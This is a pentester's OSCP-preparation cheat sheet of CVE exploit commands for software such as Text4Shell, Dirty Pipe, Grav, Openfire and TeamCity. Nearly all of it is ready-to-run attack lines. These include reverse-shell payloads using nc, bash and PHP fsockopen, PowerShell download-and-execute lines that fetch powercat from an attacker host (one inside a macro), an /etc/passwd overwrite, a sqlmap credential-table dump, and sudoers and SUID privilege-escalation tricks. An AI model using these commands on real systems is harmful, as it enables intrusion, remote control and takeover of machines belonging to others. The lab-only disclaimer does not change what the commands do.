This content is intended strictly for educational purposes and authorized penetration testing in controlled environments. Unauthorized access to systems, networks, or data is illegal and can lead to criminal prosecution.
Use these exploits only on systems you own or have explicit permission to test. The author is not responsible for any misuse, damage, or legal consequences resulting from the use of this material.
Stay ethical. Hack responsibly.
This is a curated collection of CVEs, proof-of-concept commands, and notes compiled during my preparation for the Offensive Security Certified Professional (OSCP) certification.
Each entry includes:
- A known CVE or technique
- Relevant usage or exploit commands
- A reference link
- Tags for searchability
- Notes based on lab testing (e.g. Hack The Box, TryHackMe, local VMs)
All exploits were tested in lab-only environments and are intended solely for learning, practicing, and enhancing practical pentesting skills.
wget http://:8080/search?query=%0A%0A%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27busybox%20nc%20%20%20-e%20%2Fbin%2Fsh%27%29%7D
python3 text4shell.py -u 'http://:8080/search?query=' -m rce -c 'busybox nc -e /bin/sh'
notes: easy method tags: text4shell
https://github.com/Al1ex/CVE-2022-0847
./exp /etc/passwd 1 ootz:
su rootz
notes: literally just it tags: dirtypipe, dirty pipe
https://github.com/manuelz120/CVE-2022-23940/blob/main/exploit.py
python3 exploit.py -u admin -p admin --payload "php -r '$sock=fsockopen("",80);exec("/bin/bash -i <&3 >&3 2>&3");'"
notes: (change target ip in code first)
python3 CVE_Jorani.py
notes: quite unstable so might want to reverse shell again
https://www.exploit-db.com/exploits/52082
python3 SOPlanning-1.52.01-RCE-Exploit.py -t <url + path> -u admin -p admin
notes: if the URL is weird, refer to planning.php
tags: SOPlanning 1.52.01 RCE
https://www.exploit-db.com/exploits/50640
python3 50640.py -t -p 8000 -L -P 80
notes:(Create project first)
https://github.com/SudoIndividual/CVE-2023-34152/blob/main/CVE-2023-34152.py
python3 CVE-2023-34152.py 80
tags: ImageMagick 6.9.6-4
https://github.com/CsEnox/CVE-2021-21425
python3 exploit.py -t /grav-admin -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc >/tmp/f'
tags: grav, gravcms
https://www.exploit-db.com/exploits/50911
python3 50911.py -s
notes: curl -F myFile=@image.jpg
tags: exiftool, ExifTool 12.23
./exploit.sh
tags: searchor 2.4.2 2.4.0
https://github.com/iumiro/CVE-2023-1177-MLFlow https://huntr.com/bounties/52a3855d-93ff-4460-ac24-9c7e4334198d
tags: mlflow <2.1.1
https://github.com/MoritzHuppert/CVE-2022-25018/blob/main/CVE-2022-25018.pdf https://github.com/erlaplante/pluxml-rce
python3 pluxml.py url username password
tags: pluxml 5.8.7
https://www.exploit-db.com/exploits/48789 https://github.com/SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697
python3 exploit.py --rhost --rport 8000 --lhost --lport 80
tags: Barracuda drive 6.5, FuguHub 8.4
https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-qm8h-3xvf-m7j3
sqlmap -u 'http://$ip/zm/index.php?view=request&request=event&action=removetag&tid=1' --dbms=MySQL -D zm -T Users --dump
tags: zoneminder
https://github.com/FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129/blob/main/exploit.py
python3 exploit.py
tags: Laravel 8.4.2
https://github.com/Clydeston/CVE-2023-6019/blob/main/CVE-2023-6019.py
tags: Ray OS
https://raw.githubusercontent.com/nuridincersaygili/CVE-2024-2928/refs/heads/main/CVE-2024-2928.py
python3 -t -p
tags: mlflow 2.9.2, mlflow cli
curl http://URL:8080/search?query=${script:javascript:java.lang.Runtime.getRuntime().exec('wget /nc.exe -O /tmp/nc.exe')}
https://www.exploit-db.com/exploits/50983
python3 50983.py
tags: rpc.py
https://www.exploit-db.com/exploits/51532
python3 51532.py -u url -c "busybox nc -e sh"
tags: pyloader 0.5.0 rce
python3 exploit.py ip port url
tags: mailtrail 0.53, mailtrail 0.52
https://github.com/miko550/CVE-2023-32315
python3 CVE-2023-32315.py
notes: try /plugin-admin.jsp or /plugins/openfire-management-tool-plugin/cmd.jsp tags: openfire 4.7.3
https://github.com/W01fh4cker/CVE-2024-27198-RCE
python3 CVE-2024-27198-RCE.py -t -u admin -p admin -f
tags: teamcity 2023.05.4
http://example.com/?name=#{'%20`busybox nc -e sh`'}
https://www.exploit-db.com/exploits/51293
python3 51293.py -c ip port -w : -p
tags: PDFKIT
go run exploit.go -t
https://www.exploit-db.com/exploits/49216
python3 49216.py
tags: smartermail
notes:Don’t change the port of the victim unless it is on another port, otherwise remember to make changes to the script
https://github.com/CountablyInfinite/HP-Power-Manager-Buffer-Overflow-Python3/tree/master
python3 hp_pm_exploit_p3.py 80 80
tags: HP Power Manager
https://www.exploit-db.com/exploits/45296
https://www.exploit-db.com/exploits/50130
tags: DVR
https://github.com/0bfxgh0st/MMG-LO/tree/main
python3
cmd /c powershell -exec bypass -c ""IEX (New-Object System.Net.WebClient).DownloadString('http://LHOST:8080/powercat.ps1'); powercat -c -p -e powershell"
https://www.youtube.com/watch?v=-yQsy1SzcpE
Sub Main
Shell("cmd /c powershell IEX (New-Object System.Net.Webclient).DownloadString('http://LHOST:8080/powercat.ps1');powercat -c -p -e powershell")
End Sub
echo 'exec "/bin/bash"' > app.rb
https://gist.github.com/gr33n7007h/c8cba38c5a4a59905f62233b36882325
http://192.168.212.23//sites/default/assets/img/attachments/[file.php]
notes: admin panel > global settings > change forum logo
tags: CODOFORUM
!bash
notes: Only works if less is launched with root
echo "echo 'user ALL=(root) NOPASSWD: ALL' > /etc/sudoers" > exploit.sh
(user = username)
notes: Adds user to /etc/sudoers
echo "chmod 4777 /bin/bash" > exploit.sh
(priv esc with /bin/bash -p)
notes:priv esc by setting SUID on /bin/bash